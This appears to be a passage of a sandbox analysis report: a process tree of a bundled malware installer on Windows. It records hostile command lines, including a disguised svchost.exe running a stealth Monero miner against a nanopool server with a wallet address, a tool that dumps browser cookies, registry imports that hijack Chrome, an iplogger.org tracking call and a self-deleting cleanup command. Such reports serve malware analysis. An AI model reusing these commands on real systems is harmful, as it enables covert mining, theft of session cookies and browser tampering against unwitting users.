    "C:\Users\Admin\AppData\Local\Temp\is-25PVO.tmp\Setup.tmp" /SL5="$302B6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe" /Verysilent
    3⤵
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe" /Verysilent
      4⤵
      PID:7028
    - - C:\Users\Admin\AppData\Local\Temp\is-E4KM5.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E4KM5.tmp\ProPlugin.tmp" /SL5="$203EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe" /Verysilent
        5⤵
        
        PID:7108
      - C:\Users\Admin\AppData\Local\Temp\is-EI4UI.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EI4UI.tmp\Setup.exe"
        6⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
        7⤵
        
        PID:2144
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:6024
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        8⤵
        Runs .reg file with regedit
        
        PID:4224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        8⤵
        
        PID:6920
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        9⤵
        
        PID:6544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
        10⤵
        
        PID:4308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        11⤵
        
        PID:5064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe16fb6e00,0x7ffe16fb6e10,0x7ffe16fb6e20
        12⤵
        
        PID:1780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1720 /prefetch:8
        12⤵
        
        PID:5044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
        12⤵
        
        PID:7076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
        12⤵
        
        PID:7140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
        12⤵
        
        PID:5932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
        12⤵
        
        PID:5684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        12⤵
        
        PID:2696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
        12⤵
        
        PID:2188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
        12⤵
        
        PID:6732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8
        12⤵
        
        PID:6008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:8
        12⤵
        
        PID:6236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
        12⤵
        
        PID:4504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
        12⤵
        
        PID:6708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
        12⤵
        
        PID:4528
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        12⤵
        
        PID:7584
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff707fa7740,0x7ff707fa7750,0x7ff707fa7760
        13⤵
        
        PID:7612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4088 /prefetch:8
        12⤵
        
        PID:7596
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3092 /prefetch:8
        12⤵
        
        PID:7696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3880 /prefetch:8
        12⤵
        
        PID:7752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:8
        12⤵
        
        PID:7820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:8
        12⤵
        
        PID:7844
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:8
        12⤵
        
        PID:7960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
        12⤵
        
        PID:8012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1732 /prefetch:8
        12⤵
        
        PID:8072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 /prefetch:8
        12⤵
        
        PID:8112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:8
        12⤵
        
        PID:8180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4164 /prefetch:8
        12⤵
        
        PID:5908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:8
        12⤵
        
        PID:2052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:8
        12⤵
        
        PID:5376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:8
        12⤵
        
        PID:4520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:8
        12⤵
        
        PID:6916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3392 /prefetch:8
        12⤵
        
        PID:156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8
        12⤵
        
        PID:5744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 /prefetch:8
        12⤵
        
        PID:3320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:8
        12⤵
        
        PID:4856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:8
        12⤵
        
        PID:4308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:8
        12⤵
        
        PID:7648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:8
        12⤵
        
        PID:7908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:8
        12⤵
        
        PID:8060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        12⤵
        
        PID:8044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:8
        12⤵
        
        PID:7792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
        12⤵
        
        PID:8100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:8
        12⤵
        
        PID:7904
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1932 /prefetch:8
        12⤵
        
        PID:1760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
        12⤵
        
        PID:8048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:8
        12⤵
        
        PID:5284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:8
        12⤵
        
        PID:8152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:8
        12⤵
        
        PID:7532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
        12⤵
        
        PID:6884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:8
        12⤵
        
        PID:4224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:8
        12⤵
        
        PID:6756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:8
        12⤵
        
        PID:4048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:8
        12⤵
        
        PID:6980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:8
        12⤵
        
        PID:7284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
        12⤵
        
        PID:7264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
        12⤵
        
        PID:4520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:8
        12⤵
        
        PID:684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
        12⤵
        
        PID:6940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5104 /prefetch:2
        12⤵
        
        PID:6548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
        12⤵
        
        PID:4704
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        8⤵
        Runs .reg file with regedit
        
        PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\DataFinder.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\DataFinder.exe" /Verysilent
      4⤵
      PID:5228
    - - C:\Users\Admin\Services.exe
        
        "C:\Users\Admin\Services.exe"
        5⤵
        
        PID:6992
      - C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth
        6⤵
        
        PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe" /Verysilent
      4⤵
      PID:7808
    - - C:\Users\Admin\AppData\Local\Temp\is-TN2OH.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TN2OH.tmp\Delta.tmp" /SL5="$50476,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\Delta.exe" /Verysilent
        5⤵
        
        PID:7476
      - C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe" /VERYSILENT
        6⤵
        
        PID:8128
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-3BEAB.tmp\Setup.exe & exit
        7⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        8⤵
        Kills process with taskkill
        
        PID:7336
  - - C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe" /Verysilent
      4⤵
      PID:8060
    - - C:\Users\Admin\AppData\Local\Temp\is-PLR21.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PLR21.tmp\zznote.tmp" /SL5="$702E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\zznote.exe" /Verysilent
        5⤵
        
        PID:4860
      - C:\Users\Admin\AppData\Local\Temp\is-S5HJ0.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S5HJ0.tmp\jg4_4jaa.exe" /silent
        6⤵
        
        PID:5900
  - - C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\hjjgaa.exe" /Verysilent
      4⤵
      PID:4036
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:1192
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:768

C:\Users\Admin\AppData\Local\Temp\is-5QGS8.tmp\setup_10.2_us3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5QGS8.tmp\setup_10.2_us3.tmp" /SL5="$B01CE,746887,121344,C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe" /silent
1⤵
PID:4184
- C:\Program Files (x86)\DTS\seed.sfx.exe
  "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
  2⤵
  PID:4648
- - C:\Program Files (x86)\Seed Trade\Seed\seed.exe
    "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
    3⤵
    PID:5536
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c "start https://iplogger.org/1Gusg7"
  2⤵
  PID:4896

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
